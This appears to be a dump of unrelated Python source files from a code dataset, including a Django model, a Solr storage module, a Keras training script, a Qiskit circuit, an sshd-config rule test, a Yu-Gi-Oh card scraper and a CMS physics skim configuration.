img = cv2.imread(path)
img = cv2.resize(img, args.size)
video.write(img)
video.release()
cv2.destroyAllWindows()
print('The video in this path: {}'.format(os.getcwd() + '/' + args.video_name))
| StarcoderdataPython |
6614350 | # Django
from django.db import models
class ShiftType(models.Model):
"""Shift Types model.
List of Shift types, used by users and clients.
"""
name = models.CharField('shift type', max_length=100)
def __str__(self):
return self.name
| StarcoderdataPython |
9632708 | <reponame>eaudeweb/natura2000db<filename>naturasites/storage.py
import os.path
import json
import re
import logging
import urllib
import urllib2
import errno
from contextlib import contextmanager
from collections import namedtuple
import flask
import schema
log = logging.getLogger(__name__)
class StorageError(Exception):
pass
class NotFound(StorageError):
pass
QUERY_ROWS = 1000
SolrAnswer = namedtuple('SolrAnswer', ['docs', 'facets'])
FacetItem = namedtuple('FacetItem', ['name', 'count'])
class Or(list):
""" Marker class used to ask for the 'or' query operation """
And = list # the 'and' query operation is default
class AllowWildcards(unicode):
""" don't quote the wildcard character """
class FsStorage(object):
def __init__(self, storage_path):
self.storage_path = storage_path
def _doc_path(self, doc_id):
doc_id = int(doc_id)
return os.path.join(self.storage_path, 'doc_%d.json' % doc_id)
def save_document(self, doc_id, doc):
data = doc.value
if doc_id is None:
doc_id = max([-1] + self.document_ids()) + 1
else:
doc_id = int(doc_id)
log.info("saving document %r", doc_id)
with open(self._doc_path(doc_id), 'wb') as f:
json.dump(data, f, indent=2)
return doc_id
def load_document(self, doc_id):
doc_id = int(doc_id)
with open(self._doc_path(doc_id), 'rb') as f:
return schema.SpaDoc(json.load(f))
def document_ids(self):
doc_id_list = []
for name in os.listdir(self.storage_path):
m = re.match(r'^doc_(?P<doc_id>\d+)\.json$', name)
if m is None:
continue
doc_id_list.append(int(m.group('doc_id')))
doc_id_list.sort()
return doc_id_list
_solr_text_pattern = re.compile(r'([\\+\-&|!(){}[\]^~*?:"; ])')
_solr_text_wildcards_ok_pattern = re.compile(r'([\\+\-&|!(){}[\]^~?:"; ])')
def quote_solr_text(text, wildcards_ok=False):
if wildcards_ok:
pattern = _solr_text_wildcards_ok_pattern
else:
pattern = _solr_text_pattern
return pattern.sub(r'\\\1', text);
def quote_solr_query(value, op=u' AND '):
if isinstance(value, str):
value = unicode(value)
if isinstance(value, AllowWildcards):
return quote_solr_text(value, wildcards_ok=True)
elif isinstance(value, unicode):
return quote_solr_text(value) if value else u''
elif isinstance(value, Or):
return quote_solr_query(list(value), op=u' OR ')
elif isinstance(value, And):
quoted = filter(None, map(quote_solr_query, value))
return u'(%s)' % (op.join(quoted),) if quoted else u''
elif isinstance(value, dict):
quoted = filter(None, map(quote_solr_query, value.iteritems()))
return u'(%s)' % (op.join(quoted),) if quoted else u''
elif isinstance(value, tuple) and len(value) == 2:
k, v = value
if not v:
return u''
return u'(%s:%s)' % (quote_solr_query(k), quote_solr_query(v))
else:
raise ValueError("Can't quote value of type %r" % type(value))
class SolrStorage(object):
solr_base_url = 'http://localhost:8983/solr/'
def _solr_doc(self, doc):
data = doc.value
solr_doc = {
'id': data['section1']['code'],
'name': data['section1']['name'],
'orig': json.dumps(data),
}
for element in schema.Search().all_children:
value = element.properties['index'](doc)
log.debug('index %s: %r', element.name, value)
solr_doc[element.name] = value
return solr_doc
@contextmanager
def solr_http(self, request):
if isinstance(request, urllib2.Request):
url = request.get_full_url()
else:
url = request
log.debug("Solr request to url %r", url)
try:
response = urllib2.urlopen(request)
except urllib2.URLError, e:
if hasattr(e, 'reason') and e.reason.errno == errno.ECONNREFUSED:
raise StorageError("Nu se poate stabili conexiunea")
else:
raise
try:
yield response
finally:
response.close()
def solr_query(self, query, args=[]):
full_args = [('q', query.encode('utf-8'))] + args + [
('wt', 'json'),
('rows', str(QUERY_ROWS)),
]
url = self.solr_base_url + 'select?' + urllib.urlencode(full_args)
with self.solr_http(url) as http_response:
answer = json.load(http_response)
num_found = answer['response']['numFound']
if num_found > QUERY_ROWS:
log.warn("Found more results than expected: %d > %d",
num_found, QUERY_ROWS)
def pairs(values):
values = iter(values)
while True:
yield values.next(), values.next()
facets = {}
if 'facet_counts' in answer:
for name, values in answer['facet_counts']['facet_fields'].iteritems():
facets[name] = [FacetItem(*p) for p in pairs(values) if p[1] > 0]
return SolrAnswer(answer['response']['docs'], facets)
def save_document(self, doc_id, doc):
return self.save_document_batch([doc])[0]
def save_document_batch(self, batch):
url = self.solr_base_url + 'update/json?commit=true'
request = urllib2.Request(url)
request.add_header('Content-Type', 'application/json')
request.add_data(json.dumps([self._solr_doc(doc) for doc in batch]))
with self.solr_http(request) as response:
response.read()
return [doc['section1']['code'].value for doc in batch]
def load_document(self, doc_id):
docs = self.solr_query('id:%s' % doc_id).docs
if not docs:
raise NotFound()
doc = docs[0]
return schema.SpaDoc(json.loads(doc['orig']))
def document_ids(self):
return sorted([d['id'] for d in self.solr_query('*').docs])
def search(self, criteria, get_data=False, facets=False):
query = quote_solr_query(criteria)
if not query:
query = '*:*'
log.debug('Solr query %r', query)
args = []
if facets:
args.append( ('facet', 'true') )
for element in schema.Search().all_children:
if element.properties.get('facet', False):
args.append( ('facet.field', element.name) )
want_fields = ['id', 'name']
if get_data:
want_fields.append('orig')
args.append( ('fl', ','.join(want_fields)) )
answer = self.solr_query(query, args)
docs = [{
'id': r['id'],
'name': r['name'],
'data': json.loads(r.get('orig', '{}')),
} for r in answer.docs]
return {
'docs': docs,
'facets': answer.facets,
}
def get_db(app=None):
if app is None:
app = flask.current_app
config = app.config
engine_name = config['STORAGE_ENGINE']
if engine_name == 'solr':
return SolrStorage()
elif engine_name == 'filesystem':
return FsStorage(config['STORAGE_FS_PATH'])
else:
raise ValueError('Unknown storage engine %r' % engine_name)
| StarcoderdataPython |
1838578 | """
TODO
"""
from selenium.webdriver.common.by import By
from .base import BasePageLocators
# pylint: disable=too-few-public-methods
class AccountLocators(BasePageLocators):
"""
TODO
"""
ADDRESS_BOOK_LINK = (By.LINK_TEXT, "Address Book")
EDIT_ACCOUNT_LINK = (By.XPATH, "//div[@id='content']//a[.='Edit Account']")
YOUR_STORE_LINK = (By.LINK_TEXT, "Your Store")
| StarcoderdataPython |
9663651 | <reponame>bpiwowar/TexSoup
from TexSoup.reader import read_expr, read_tex
from TexSoup.data import *
from TexSoup.utils import *
from TexSoup.tokens import tokenize
from TexSoup.category import categorize
import itertools
def read(tex, skip_envs=(), tolerance=0):
"""Read and parse all LaTeX source.
:param Union[str,iterable] tex: LaTeX source
:param Union[str] skip_envs: names of environments to skip parsing
:param int tolerance: error tolerance level (only supports 0 or 1)
:return TexEnv: the global environment
"""
if not isinstance(tex, str):
tex = ''.join(itertools.chain(*tex))
buf = categorize(tex)
buf = tokenize(buf)
buf = read_tex(buf, skip_envs=skip_envs, tolerance=tolerance)
return TexEnv('[tex]', begin='', end='', contents=buf), tex
| StarcoderdataPython |
4892376 | import os
import sys
import glob
import re
import h5py
os.environ['KERAS_BACKEND'] = 'tensorflow'
import setGPU
from keras.callbacks import EarlyStopping, ModelCheckpoint
if __package__ is None:
sys.path.append(os.path.realpath("/data/shared/Software/CMS_Deep_Learning"))
from CMS_Deep_Learning.io import gen_from_data, retrieve_data
if __package__ is None:
sys.path.append(os.path.realpath("/data/shared/Software/RegressionLCD"))
from model import *
from preprocessing import *
from analysis import *
mName = 'fix_chPi_dnn'
model = dnnModel(modName = mName)
# Defining the directories, which contain the split data
train_dir = "/bigdata/shared/LCD2018/ChPiEscan/train/"
valid_dir = "/bigdata/shared/LCD2018/ChPiEscan/val/"
#test_dir = "/bigdata/shared/LCD2018/ChPiEscan/test/"
# total number of samples
tr_samples = nSamples(train_dir)
val_samples = nSamples(valid_dir)
# generator
# training set:
train = gen_from_data(train_dir, batch_size=400, data_keys=[["ECAL", "HCAL"], "energy"])
# validation set:
val = gen_from_data(valid_dir, batch_size=400, data_keys=[["ECAL", "HCAL"], "energy"])
# testing set:
test = gen_from_data(valid_dir, batch_size=400, data_keys=[["ECAL", "HCAL"], "energy"])
hist = model.fit_generator(train, samples_per_epoch=tr_samples, nb_epoch=50, validation_data = val, nb_val_samples=val_samples, verbose=1, callbacks=[EarlyStopping(monitor='val_loss', patience=8, verbose=1, mode='min'), ModelCheckpoint(filepath=('/nfshome/vitoriabp/gpu-4-culture-plate-sm/new_ds_notebooks/' + mName + '.h5'), monitor='val_loss', verbose=0, save_best_only=True, mode='min')])
saveLosses(hist, name="mName")
show_losses([("chPi", hist)])
| StarcoderdataPython |
4806863 | import qiskit
from qiskit import *
from qiskit.tools.visualization import plot_histogram
secretnumber = input("Enter Secret number")
circuit = QuantumCircuit(len(secretnumber)+1, len(secretnumber))
circuit.h(range(len(secretnumber)))
circuit.x(len(secretnumber))
circuit.h(len(secretnumber))
circuit.barrier()
for ii,yesno in enumerate(reversed(secretnumber)):
if yesno == "1":
circuit.cx(ii,len(secretnumber))
circuit.barrier()
circuit.h(range(len(secretnumber)))
circuit.barrier()
circuit.measure(range(len(secretnumber)), range(len(secretnumber)))
simulator = Aer.get_backend('qasm_simulator')
result = execute(circuit, backend= simulator, shots=1).result()
counts = result.get_counts()
print(counts)
plot_histogram(counts)
| StarcoderdataPython |
6653359 | #! /usr/bin/env python
class Colours(dict):
def __init__(self):
dict.__init__(dict(self))
self.yellow = '\033[93m'
self.green = '\033[92m'
self.red = '\033[91m'
self.reset = '\033[0m'
def to_yellow(self, message):
return self.yellow + message + self.reset
def to_green(self, message):
return self.green + message + self.reset
def to_red(self, message):
return self.red + message + self.reset
COLOURS = Colours()
| StarcoderdataPython |
9685461 | from rules import sshd_secure
from insights.tests import InputData, archive_provider, context_wrap
from insights.core.plugins import make_response
from insights.specs import Specs
# The following imports are not necessary for integration tests
from insights.parsers.secure_shell import SshDConfig
OPENSSH_RPM = """
openssh-6.6.1p1-31.el7.x86_64
openssh-6.5.1p1-31.el7.x86_64
""".strip()
EXPECTED_OPENSSH = "openssh-6.6.1p1-31.el7"
GOOD_CONFIG = """
AuthenticationMethods publickey
LogLevel VERBOSE
PermitRootLogin No
# Protocol 2
""".strip()
BAD_CONFIG = """
AuthenticationMethods badkey
LogLevel normal
PermitRootLogin Yes
Protocol 1
""".strip()
DEFAULT_CONFIG = """
# All default config values
""".strip()
def test_check_auth_method():
"""
This is an example of using unit tests with integration tests.
Although integration tests should also test this function,
if problems exist it may be easier to find if you write unit
tests like these.
"""
errors = {}
sshd_config = SshDConfig(context_wrap(BAD_CONFIG))
errors = sshd_secure.check_auth_method(sshd_config, errors)
assert errors == {'AuthenticationMethods': 'badkey'}
errors = {}
sshd_config = SshDConfig(context_wrap(GOOD_CONFIG))
errors = sshd_secure.check_auth_method(sshd_config, errors)
assert errors == {}
errors = {}
sshd_config = SshDConfig(context_wrap(DEFAULT_CONFIG))
errors = sshd_secure.check_auth_method(sshd_config, errors)
assert errors == {'AuthenticationMethods': 'default'}
@archive_provider(sshd_secure.report)
def integration_tests():
"""
InputData acts as the data source for the parsers
so that they may execute and then be used as input
to the rule. So this is essentially and end-to-end
test of the component chain.
"""
input_data = InputData("GOOD_CONFIG")
input_data.add(Specs.sshd_config, GOOD_CONFIG)
input_data.add(Specs.installed_rpms, OPENSSH_RPM)
yield input_data, None
input_data = InputData("BAD_CONFIG")
input_data.add(Specs.sshd_config, BAD_CONFIG)
input_data.add(Specs.installed_rpms, OPENSSH_RPM)
errors = {
'AuthenticationMethods': 'badkey',
'LogLevel': 'normal',
'PermitRootLogin': 'Yes',
'Protocol': '1'
}
expected = make_response(sshd_secure.ERROR_KEY,
errors=errors,
openssh=EXPECTED_OPENSSH)
yield input_data, expected
input_data = InputData("DEFAULT_CONFIG")
input_data.add(Specs.sshd_config, DEFAULT_CONFIG)
input_data.add(Specs.installed_rpms, OPENSSH_RPM)
errors = {
'AuthenticationMethods': 'default',
'LogLevel': 'default',
'PermitRootLogin': 'default'
}
expected = make_response(sshd_secure.ERROR_KEY,
errors=errors,
openssh=EXPECTED_OPENSSH)
yield input_data, expected
| StarcoderdataPython |
6573275 | <reponame>uktrade/directory-components
from unittest.mock import Mock, patch
import pytest
from directory_components import context_processors
def test_analytics(settings):
settings.GOOGLE_TAG_MANAGER_ID = '123'
settings.GOOGLE_TAG_MANAGER_ENV = '?thing=1'
settings.UTM_COOKIE_DOMAIN = '.thing.com'
actual = context_processors.analytics(None)
assert actual == {
'directory_components_analytics': {
'GOOGLE_TAG_MANAGER_ID': '123',
'GOOGLE_TAG_MANAGER_ENV': '?thing=1',
'UTM_COOKIE_DOMAIN': '.thing.com',
}
}
def test_cookie_notice(settings):
settings.PRIVACY_COOKIE_DOMAIN = '.thing.com'
actual = context_processors.cookie_notice(None)
assert actual == {
'directory_components_cookie_notice': {
'PRIVACY_COOKIE_DOMAIN': '.thing.com',
}
}
@pytest.fixture
def sso_user():
return Mock(
id=1,
email='<EMAIL>',
spec=['id', 'email'],
hashed_uuid='1234'
)
@pytest.fixture
def admin_superuser():
return Mock(
id=1,
email='<EMAIL>',
spec=['id', 'email'],
is_staff=True
)
@pytest.fixture
def request_logged_in(rf, sso_user):
request = rf.get('/')
request.sso_user = sso_user
return request
@pytest.fixture
def request_logged_in_admin(rf, admin_superuser):
request = rf.get('/')
request.user = admin_superuser
return request
@pytest.fixture
def request_logged_out(rf):
request = rf.get('/')
request.sso_user = None
return request
def test_sso_logged_in(request_logged_in):
context = context_processors.sso_processor(request_logged_in)
assert context['sso_is_logged_in'] is True
def test_sso_profile_url(request_logged_in, settings):
settings.SSO_PROFILE_URL = 'http://www.example.com/profile/'
context = context_processors.sso_processor(request_logged_in)
assert context['sso_profile_url'] == settings.SSO_PROFILE_URL
def test_sso_register_url_url(request_logged_in, settings):
settings.SSO_PROXY_SIGNUP_URL = 'http://www.example.com/signup/'
context = context_processors.sso_processor(request_logged_in)
assert context['sso_register_url'] == (
'http://www.example.com/signup/?next=http://testserver/'
)
def test_sso_logged_out(request_logged_out):
context = context_processors.sso_processor(request_logged_out)
assert context['sso_is_logged_in'] is False
def test_sso_login_url(request_logged_in, settings):
settings.SSO_PROXY_LOGIN_URL = 'http://www.example.com/login/'
expected = 'http://www.example.com/login/?next=http://testserver/'
context = context_processors.sso_processor(request_logged_in)
assert context['sso_login_url'] == expected
def test_sso_logout_url(request_logged_in, settings):
settings.SSO_PROXY_LOGOUT_URL = 'http://www.example.com/logout/'
context = context_processors.sso_processor(request_logged_in)
assert context['sso_logout_url'] == (
'http://www.example.com/logout/?next=http://testserver/'
)
def test_sso_user(request_logged_in, sso_user):
context = context_processors.sso_processor(request_logged_in)
assert context['sso_user'] == sso_user
@patch('django.utils.translation.get_language', Mock(return_value='de'))
def test_ga360_context_processor_all_data(settings, request_logged_in):
settings.GA360_BUSINESS_UNIT = 'Test App'
context = context_processors.ga360(request_logged_in)
assert context['ga360'] == {
'business_unit': 'Test App',
'site_language': 'de',
'user_id': '1234',
'login_status': True
}
@patch('django.utils.translation.get_language', Mock(return_value='de'))
def test_ga360_context_processor_admin_all_data(settings, request_logged_in_admin):
settings.GA360_BUSINESS_UNIT = 'Test App'
context = context_processors.ga360(request_logged_in_admin)
assert context['ga360'] == {
'business_unit': 'Test App',
'site_language': 'de',
'user_id': None,
'login_status': True
}
def test_ga360_context_processor_no_data(request_logged_out):
context = context_processors.ga360(request_logged_out)
assert context['ga360'] == {
'site_language': 'en-gb',
'user_id': None,
'login_status': False
}
def test_header_footer_processor(settings):
context = context_processors.header_footer_processor(None)
assert context['header_footer_urls'] == {
'about': 'https://exred.com/about/',
'dit': 'https://www.gov.uk/government/organisations/department-for-international-trade',
'get_finance': 'https://exred.com/get-finance/',
'ukef': 'https://exred.com/get-finance/',
'performance': 'https://exred.com/performance-dashboard/',
'privacy_and_cookies': 'https://exred.com/privacy-and-cookies/',
'terms_and_conditions': 'https://exred.com/terms-and-conditions/',
'accessibility': 'https://exred.com/accessibility-statement/',
'cookie_preference_settings': 'https://exred.com/cookies/',
'fas': 'https://international.com/international/trade/',
'advice': 'https://exred.com/advice/',
'markets': 'https://exred.com/markets/',
'search': 'https://exred.com/search/',
'services': 'https://exred.com/services/',
'domestic_news': 'https://exred.com/news/',
'international_news': 'https://international.com/international/content/news/',
'how_to_do_business_with_the_uk': 'https://international.com/international/content/how-to-do-business-with-the-uk/', # noqa
'industries': 'https://international.com/international/content/industries/',
'market_access': 'https://exred.com/report-trade-barrier/',
'create_an_export_plan': 'https://exred.com/advice/create-an-export-plan/',
'find_an_export_market': 'https://exred.com/advice/find-an-export-market/',
'define_route_to_market': 'https://exred.com/advice/define-route-to-market/',
'get_export_finance_and_funding': 'https://exred.com/advice/get-export-finance-and-funding/',
'manage_payment_for_export_orders': 'https://exred.com/advice/manage-payment-for-export-orders/',
'prepare_to_do_business_in_a_foreign_country': 'https://exred.com/advice/prepare-to-do-business-in-a-foreign-country/', # noqa
'manage_legal_and_ethical_compliance': 'https://exred.com/advice/manage-legal-and-ethical-compliance/',
'prepare_for_export_procedures_and_logistics': 'https://exred.com/advice/prepare-for-export-procedures-and-logistics/', # noqa
'magna_home': 'https://greatcms.com',
'magna_where_to_export': 'https://greatcms.com/where-to-export/',
'magna_learn_to_export': 'https://greatcms.com/learn/categories/',
'magna_exportplan_dashboard': 'https://greatcms.com/export-plan/dashboard/',
'magna_search': 'https://greatcms.com/search/',
'magna_privacy_and_cookies': 'https://greatcms.com/privacy-and-cookies/',
'magna_terms_and_conditions': 'https://greatcms.com/terms-and-conditions/',
'magna_accessibility': 'https://greatcms.com/accessibility-statement/',
'magna_cookie_preference_settings': 'https://greatcms.com/cookies/',
'magna_contact_us': 'https://greatcms.com/contact/',
'magna_performance': 'https://greatcms.com/performance-dashboard/',
'magna_account': 'https://greatcms.com/profile/',
'magna_advice': 'https://greatcms.com/advice/',
'magna_markets': 'https://greatcms.com/markets/',
'magna_services': 'https://greatcms.com/services/',
'magna_international': 'https://greatcms.com/international/'
}
def test_invest_header_footer_processor():
context = context_processors.invest_header_footer_processor(None)
assert context['invest_header_footer_urls'] == {
'industries': 'https://international.com/international/content/industries/',
'uk_setup_guide': 'https://international.com/international/content/how-to-setup-in-the-uk/',
}
def test_urls_processor(settings):
context = context_processors.urls_processor(None)
assert context['services_urls'] == {
'contact_us': 'https://exred.com/contact/',
'contact_us_international': 'https://international.com/international/contact/',
'events': 'https://events.com',
'exopps': 'https://exopps.com',
'exred': 'https://exred.com',
'fab': 'https://fab.com',
'fas': 'https://international.com/international/trade/',
'feedback': 'https://exred.com/contact/feedback/',
'great_domestic': 'https://exred.com',
'great_international': 'https://international.com/international/',
'invest': 'https://international.com/international/invest/',
'soo': 'https://soo.com',
'sso': 'https://sso.com',
'uk_setup_guide': 'https://international.com/international/content/how-to-setup-in-the-uk/',
'isd': 'https://international.com/international/investment-support-directory/',
'office_finder': 'https://exred.com/contact/office-finder/',
}
def test_feature_returns_expected_features(settings):
settings.FEATURE_FLAGS = {
'COMPANIES_HOUSE_OAUTH2_ENABLED': True
}
actual = context_processors.feature_flags(None)
assert actual == {
'features': {
'COMPANIES_HOUSE_OAUTH2_ENABLED': True,
}
}
| StarcoderdataPython |
1884434 | <gh_stars>10-100
"""
Plot output json files
"""
import json
import logging
logger = logging.getLogger("matplotlib")
logger.setLevel(logging.INFO)
from matplotlib import pyplot as plt
def classification_poisoning(
json_filepath="outputs/latest.json", output_filepath=None, show=False
):
"""
Plot classification results
json_filepath - filepath for json file
output_filepath - filepath for saving output graph
if None, use json_filepath and change ending to .pdf
show - if True, show the plot instead of saving to file
"""
with open(json_filepath) as f:
blob = json.load(f)
config = blob["config"]
results = blob["results"]
data = config["dataset"]["name"]
knowledge = config["attack"]["knowledge"]
if config["defense"]:
defense = config["defense"]["name"]
if output_filepath is None and not show:
output_filepath = json_filepath
if output_filepath.endswith(".json"):
output_filepath = output_filepath[: -len(".json")]
output_filepath += "_{}.pdf"
for metric_name in [
"undefended_backdoor_success_rate",
"defended_backdoor_success_rate",
"delta_accuracy",
]:
main_title = f"{data} for {knowledge}-box attack \nwith {defense} defense."
fraction_poisons = results[metric_name + "_mean"].keys()
metric_mean = [results[metric_name + "_mean"][k] for k in fraction_poisons]
metric_std = [results[metric_name + "_std"][k] for k in fraction_poisons]
fraction_poisons = list(map(float, fraction_poisons))
plt.errorbar(fraction_poisons, metric_mean, metric_std, capsize=5)
plt.title(main_title)
plt.xlabel("Fraction of dataset poisoned")
plt.ylabel(f"Model performance ({metric_name})")
if show:
plt.show()
else:
plt.tight_layout()
plt.savefig(output_filepath.format(metric_name), format="pdf")
plt.close()
| StarcoderdataPython |
4802761 | # Search a 2D Matrix
class Solution:
def searchRow(self, matrix, target):
left, right = 0, len(matrix) - 1
while left < right:
mid = (left + right) // 2
mv = matrix[mid][0]
# print(f'left: {left}, mid: {mid}, right: {right}, mv: {mv}')
if target < mv:
right = mid - 1
else:
left = mid
if left + 1 == right:
if matrix[right][0] <= target:
return right
else:
return left
return left
def searchMatrix(self, matrix, target):
rowIndex = self.searchRow(matrix, target)
row = matrix[rowIndex]
left, right = 0, len(row) - 1
while left <= right:
mid = (left + right) // 2
if target == row[mid]:
return True
elif target > row[mid]:
left = mid + 1
else:
right = mid - 1
return False
if __name__ == "__main__":
sol = Solution()
matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]]
target = 12
matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]]
target = 3
print(sol.searchMatrix(matrix, target))
| StarcoderdataPython |
9745332 | from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.shell.sh import ShellModule as ShModule
class ShellModule(ShModule):
def build_module_command(self, env_string, shebang, cmd, arg_path=None, rm_tmp=None):
new_cmd = super(ShellModule, self).build_module_command(env_string, shebang, cmd, arg_path, rm_tmp)
new_cmd = '/bin/zsh -l -c "%s"' % (new_cmd)
return new_cmd
| StarcoderdataPython |
3294755 | # STD
import unittest
from unittest import mock as mock
# PROJECT
import bwg
from tests.fixtures import RELATION_MERGING_TASK
from tests.toolkit import MockOutput, MockInput
class RelationMergingTaskTestCase(unittest.TestCase):
"""
Test RelationMergingTask.
"""
@mock.patch('bwg.tasks.relation_merging.RelationMergingTask.output')
@mock.patch('bwg.tasks.relation_merging.RelationMergingTask.input')
def test_task_functions(self, input_patch, output_patch):
with mock.patch(
"bwg.tasks.relation_merging.RelationMergingTask.workflow_resources", new_callable=mock.PropertyMock()
) as workflow_mock:
task_config = {
"CORPUS_ENCODING": "",
"RELATION_MERGING_OUTPUT_PATH": ""
}
output_patch.return_value = MockOutput()
input_patch.return_value = (
MockInput(RELATION_MERGING_TASK["input"][0]),
MockInput(RELATION_MERGING_TASK["input"][0])
)
workflow_mock.__get__ = mock.Mock(return_value={})
task = bwg.tasks.relation_merging.RelationMergingTask(task_config=task_config)
# Testing
self._test_get_relations_from_sentence_json()
self._test_is_relevant_article(task)
self._test_is_relevant_sentence(task)
@staticmethod
def _test_get_relations_from_sentence_json():
# TODO (Implement) [DU 28.07.17]
pass
@staticmethod
def _test_is_relevant_article(task):
# TODO (Implement) [DU 28.07.17]
pass
@staticmethod
def _test_is_relevant_sentence(task):
# TODO (Implement) [DU 28.07.17]
pass | StarcoderdataPython |
6537736 | <filename>repiko/module/ygoOurocg_ver4.py
#coding:utf-8
import sqlite3
import configparser
import json
from urllib import request
from urllib import parse
from bs4 import BeautifulSoup
from .ygo.card import Card,CardAttribute,CardRace,CardType,LinkMark
class ourocg():
def __init__(self):
#config = configparser.ConfigParser()
#config.read('setting.ini')
#self.path=config["ygo"]["ygopath"]
self.edition=2
def SetTranslateEdition(self,ed):
if ed.lower()=="cn":
self.edition=0
elif ed.lower()=="nw":
self.edition=1
def FindCardByName(self,searchtext):
#result="找不到卡片的说……"
url=r"https://www.ourocg.cn/search/{k}"
kw =searchtext
#cn=kw
kw=parse.quote(kw)
encode_url=url.format(k=kw)
#print(encode_url)
req=request.urlopen(encode_url)
raw_html=req.read().decode("utf8")
html=BeautifulSoup(raw_html,"lxml")
targeturl=""
Pmark=[]
if html.find_all("title")[0].string.startswith("搜索"):
scripts=html.find_all("script")
for s in scripts:
if(str(s.string).strip().startswith("window.__STORE__")):
targets=str(s.string[s.string.find("{"):]).strip()[:-1]
carddata=json.loads(targets)
sts=searchtext.strip()
for tar in carddata["cards"]:
if tar["name"]== sts or tar["name_nw"]==sts or tar["name_ja"]== sts or tar["name_en"]== sts:
targeturl=tar["href"].replace("\\","")
Pmark=[tar.get("pend_l",None),tar.get("pend_r",None)]
#print(Pmark)
if targeturl=="" and len(carddata["cards"])!=0:
tar=carddata["cards"][0]
targeturl=tar["href"].replace("\\","")
Pmark=[tar.get("pend_l",None),tar.get("pend_r",None)]
#print(targeturl)
break
else:
targeturl=encode_url
if targeturl!="":
encode_url=targeturl
req=request.urlopen(encode_url)
raw_html=req.read().decode("utf8")
#print(encode_url)
html=BeautifulSoup(raw_html,"lxml")
isRD=False
if html.find("div",{"class":"rd-mark"}):
isRD=True
div=html.find_all("div",{"class":"val"})
divr=[[y for y in x.stripped_strings] for x in div]
#print(divr)
cardtypes=divr[3]
c=Card(cardtypes)
if c.isLink:
linkmark=html.find("div",{"class":"linkMark"})
for mark in linkmark.find_all("i"):
temp=mark["class"][1].split("_")
if temp[2]=="on":
c.linkmark.add( LinkMark.fromNumber(int(temp[1]),True) )
c.name=divr[0][self.edition]
jpname=divr[1][0]
if jpname!="-":
c.jpname=jpname.replace("・","·")
enname=divr[2][0]
if enname!="-":
c.enname=enname
c.isRD=isRD
c.id=divr[4][0]
limitnum=5
if isRD:
limitnum=4
c.limit=divr[limitnum][0]
otnum=limitnum+1
if divr[otnum]: #如果是OCG/TCG专有
c.ot=divr[otnum][0]
effectnum=-1
if c.isMonster:
c.race=CardRace.fromStr(divr[otnum+1][0])
c.attribute=CardAttribute.fromStr(divr[otnum+2][0])
if c.isXyz:
c.rank=ourocg.dealInt(divr[otnum+3][0])
c.level=c.rank
if c.isP:
c.Pmark=Pmark
if c.isLink:
c.linknum=ourocg.dealInt(divr[otnum+5][0])
c.level=c.linknum
c.attack=ourocg.dealInt(divr[otnum+4][0])
else:
c.level=ourocg.dealInt(divr[otnum+3][0])
c.attack=ourocg.dealInt(divr[otnum+4][0])
c.defence=ourocg.dealInt(divr[otnum+5][0])
L=len(divr[effectnum])
tempString=divr[effectnum][-1]
effectlist=[0]
for x in range(-2,-1*(L+1),-1):
if divr[effectnum][x]==tempString:
tempnum=-1-x
effectlist.append(L-2*tempnum)
effectlist.append(effectlist[1]+tempnum)
effectlist.append(effectlist[2]+tempnum)
effects=divr[effectnum][effectlist[self.edition]:effectlist[self.edition+1]]
effectText="\n".join(effects)
c.effect=ourocg.beautifyText(effectText)
return c
return None
def getWikiLink(self,card):
if card.jpname:
pageword=f"《{ourocg.towikistr(card.jpname)}》"
elif card.enname:
pageword=f"《{card.enname}》"
else:
return None
pageword=parse.quote(pageword,encoding="euc-jp")
return r"https://yugioh-wiki.net/index.php?cmd=read&page="+pageword
@staticmethod
def towikistr(text):
"""半角转全角,以及一些特殊符号的转换"""
transDict={
#' ':chr(12288), #半角空格直接转化
'·':'・',
'-':'−',
"Ⅰ":"I",
"Ⅱ":"II",
"Ⅲ":"III",
"Ⅳ":"IV",
"Ⅴ":"V",
"Ⅵ":"VI",
"Ⅶ":"VII",
"Ⅷ":"VIII",
"Ⅸ":"IX",
"Ⅹ":"X",
"Ⅺ":"XI",
"Ⅻ":"XII"
}
r = ""
for c in text:
trans=transDict.get(c,None)
if trans:
c=trans
else:
oc=ord(c)
if oc > 32 and oc <= 126: #半角字符(除空格)根据关系转化
c=chr(oc+65248)
r += c
return r
@staticmethod
def dealInt(text):
if text.isdigit():
return int(text)
else:
return text
@staticmethod
def beautifyText(text):
"""试着给效果文本加换行,好看一点"""
nums=set(list("①②③④⑤⑥⑦⑧⑨⑩●"))
transDict={"・":"·"}
r = ""
l=len(text)
for i,c in enumerate(text):
trans=transDict.get(c,None)
if trans:
c=trans
elif c in nums:
if 1<i<l-1 and text[i-1]!="\n" and text[i+1]==":":
c="\n"+c
r+=c
return r
if __name__ == "__main__":
text=input()
a=ourocg()
print(a.FindCardByName(text))
| StarcoderdataPython |
8168124 | import FWCore.ParameterSet.Config as cms
process = cms.Process("SKIM")
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/data/Commissioning08/Cosmics/RECO/CRAFT_ALL_V9_225-v2/0000/FE32B1E4-C7FA-DD11-A2FD-001A92971ADC.root'),
secondaryFileNames = cms.untracked.vstring(
'/store/data/Commissioning08/Cosmics/RAW/v1/000/068/000/708C5612-CFA5-DD11-AD52-0019DB29C5FC.root',
'/store/data/Commissioning08/Cosmics/RAW/v1/000/068/000/38419E41-D1A5-DD11-8B68-001617C3B6E2.root',
'/store/data/Commissioning08/Cosmics/RAW/v1/000/068/000/2CDF3B0F-CFA5-DD11-AE18-000423D99A8E.root')
)
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.10 $'),
name = cms.untracked.string('$Source: /cvs_server/repositories/CMSSW/CMSSW/DPGAnalysis/Skims/python/TrackerPointing_cfg.py,v $'),
annotation = cms.untracked.string('CRAFT TrackerPointing skim')
)
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(10))
process.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))
process.load("Configuration.StandardSequences.MagneticField_cff")
process.load("Configuration.StandardSequences.Geometry_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.globaltag = 'CRAFT_V4P::All'
process.prefer("GlobalTag")
process.load("Configuration.StandardSequences.ReconstructionCosmics_cff")
process.cosmictrackfinderP5TkCntFilter = cms.EDFilter("TrackCountFilter",
src = cms.InputTag('cosmictrackfinderP5'),
minNumber = cms.uint32(1)
)
